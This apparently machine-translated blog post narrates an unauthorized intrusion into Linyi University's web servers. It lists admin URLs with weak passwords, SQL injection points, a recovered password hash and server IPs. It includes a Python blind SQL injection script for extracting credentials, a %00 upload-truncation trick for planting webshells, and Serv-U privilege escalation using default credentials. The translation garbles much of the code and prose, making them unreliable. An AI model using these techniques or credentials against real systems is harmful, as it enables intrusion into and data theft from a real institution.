A retro-style test on a university in Linyi

After a long time ago, I got it. Later, I did not sort it out because I was busy. I was a machine friend asking for help. In fact, this station did a bad job. I scanned wvs directly, the background address of the weak password is displayed, http://business.2cto.com /Jpk/ glx/admin/manage. asp http://business.2cto.com /Jpkc/wangl2/huxiujun/admin/manage. asp http://business.2cto.com /Jpkc/sjjjgl/admin/login. asp http://business.2cto.com /Jpk/ glx/admin/login. asp http://business.2cto.com /Jpkc/wangl2/huxiujun/admin/login. asp user: admin password: 1 The three backgrounds are roughly like the following. There is basically no function in the background, either an error or insufficient permissions. All of them are under the jpkc (excellent course) directory and should be the actions of multiple careless administrators. Because most background functions are unavailable, only the parameter server name business.2cto.com Server IP 211.64.240.206 server port 80 server time 05:17:45 IIS version Microsoft-IIS/6.0 script timeout time 90 seconds this file path F: \ sxy \ jpk\ sjjjgl \ admin \ ServerInfo. asp Server CPU count server interpretation engine VBScript/5.6.8850 Server OS turn around to see several injection points scanned out, http://business.2cto.com /Colum3/more. asp? Bigcataid = 1' http://business.2cto.com /Jiuye/gqtzs. asp? BigClassID = 1' http://business.2cto.com /Colum3/readnews. asp? Newsid = 1' use the first one directly. A good error is reported. First, run it in the tool. pangolin ran tables and column, but could not run data, I don't know why admin title newsid content about number passwd logins email username id news title newsid content about system title newsid content about search logo name email id in many cases, many injection tools are difficult to use, so it is very important to have a set of injection tools. It is based on the principle of indirect and scalable to modify a python script of others, the script is not intelligent at all --!, However, there are many customization options and there is no intelligent judgment. After all, the script [python] view plaincopyfrom sys import exit from urllib import urlopen from string import join is used, strip from re import search def check_judge (url): urlfile = urlopen (url) htmlcodes = urlfile. read () if search (judge, htmlcodes): return 1 else: return 0 def get_tablename (): tablefile = open ("table.txt") for line in tablefile. readlines (): line = strip (line) SQL = join (['% 2 0or % 20 exists % 20 (select % 20 * % 20 from % 20', line, ')'], '') if check_judge (url + SQL): print" Found: ", line else: print #" Error: ", url + SQL def get_columnname (tablename): columnname = open (" column.txt ") for columnnameline in columnname. readlines (): columnnameline = strip (columnnameline) SQL = join (['% 20or % 20 exists % 20 (select % 20', columnnameline,' % 20 from % 20 ', tablename, ')'], '') if check_judge (url + SQL): print" Foun D: ", columnnameline," \ n "else: print #" Error: ", url + SQL def get_datalenth (tablename, columnname): for x in range (1, 51 ): SQL = join (['% 20or % 20 (select % 20top % 201% 20len (', columnname, ') % 20 From % 20', tablename,') = ', str (x)], '') if check_judge (url + SQL): print" Found: ", x," \ n "break else: print" Error :", SQL def get_data (tablename, columnname, lenth): list = [] for x in [range (97,123), range (), range (), ra Nge (123,256), range ()]: list. extend (x) global username = ''for y in range (1, lenth + 1): print" Now! Crack the left ", y," of the username "," Waiting ~~~~~~~ "For z in list: SQL = join ([" % 20or % 20 (select % 20top % 201% 20asc (mid (", columnname,", ", str (y ), ",", "1) % 20 from % 20", tablename, ") =", str (z)], '') if check_judge (url + SQL ): print chr (z) username = join ([username, chr (z)], '') break print" Found the username =: ", username, "\ n" print "\ n ################################ ######################################## \ n "print" SQL Injection Scripts By LanLan with Python 2.3.x (QQ: 915910623) "print" Email: wanglanlan2008@gmial.com "print "#################################### ####################################\ n "; # url = raw_input ('supply a URL to test inject = ') # judge = raw_input ("\ nJudge string =") url =" http://business.2cto.com /Colum3/more. asp? Bigcataid = 1 "judge =" 2012-11-7 "# get_tablename () get_columnname (" news ") get_datalenth (" admin "," passwd ") get_data (" admin "," passwd ", 16) the user name and password are successfully displayed, but the background address is http://business.2cto.com /Colum3/login. asp shows that the password is incorrect. It hurts a bit. username: sxy passwd: b34c037051a0adab hsq. Because this website is too broken, I have no idea how to proceed, at this time, the host friend went to the background of another station of Linyi University and decided to check that the host friend ran out of the Administrator's password through the injection point. This injection point is very interesting and will list the filtered characters, the union function is not used to filter the case. However, it is troublesome to guess the number of fields. This function will be added to the script. http://recenter.2cto.com /View. asp? Id = 822 Admin2 123456abc after logging on to the background, I found on the article release page that the editor version is outdated and found the editor management information in js // Copyright (C) 2000, Microsoft, corp. all rights reserved. // File: rte. js // Author: Scott Isaacs // Contents: RTE Management Code // editor public (API) according to the prompts of the host friends, there is a file Truncation Vulnerability of % 00, however, according to my investigation, if the upload plug-in chooses to rename the file storage, the % 00 Truncation Vulnerability will be useless. It is similar to the principle of the IIS6.0 parsing vulnerability, but its applicability is wider, take the common unafraid upload class as an example. sFileName = Mid (sinfo, iFindStart, iFindEnd-iFindStart) oFil EInfo. fileName = Mid (sFileName, limit Rev (sFileName, "\") + 1) oFileInfo. filePath = Left (sFileName, limit Rev (sFileName, "\") oFileInfo. fileExt = Mid (sFileName, limit Rev (sFileName ,". ") + 1) All are used. The reset RVE function always reads left to right. This causes the filename to be test if test.asp;00.jpg is constructed. asp % 00 extis. jpg if the plug-in provides a custom path, or uses the user name as the path, you can also construct this/test. asp % 00/test.jpg, but this is rare, but this website does not matter. It does not directly filter asp --!, All the pony horses are uploaded and you are going to penetrate the Intranet. After scanning the ip segment, I found many hosts with independent ip addresses ----- IP: 211.64.240.18 ----- http://www.bkjia.com /Welcome to Linyi University! ----- IP: 211.64.240.51 ----- http://mail.2cto.com /Linyi University ----- IP: 211.64.240.71 ----- http://oa.2cto.com /Linyi University Office System ----- IP: 211.64.240.203 ----- http://jwco.2cto.com /Welcome To The Office of Academic Affairs of Linyi University http://wlxy.2cto.com /Linyi University Logistics college ----- IP: 211.64.240.204 ----- http://sky.2cto.com /The College of Life Sciences of Linyi University used serv-U to escalate permissions and successfully created an account. Here we will talk about it a little bit, serv-U Privilege Escalation principle this serv-U is an FTP service with default administrator password and port erv-u> 3. in Version x, the default Local Management port is 43958, and the default Administrator is LocalAdministrator. The default password is # l @ $ ak #. lk; 0 @ P use the Administrator to create a domain, add a system-level account, and execute the command

After the super administrator is successfully established, it is found that although the host is open 3389, it cannot be connected. The principle is as follows: target: 3389 ---> target: 21 ----> Gateway ----> source: 1234 after establishing a connection, we only need to connect to the local port 1234, you can establish a 3389 connection with the other party. You can also use vpn on the Internet. This should not work. vpn is a bit like another Intranet. Because there is no Internet IP address, the plan to penetrate the Intranet is put on hold for the moment, which of the following experts can do this if they are interested.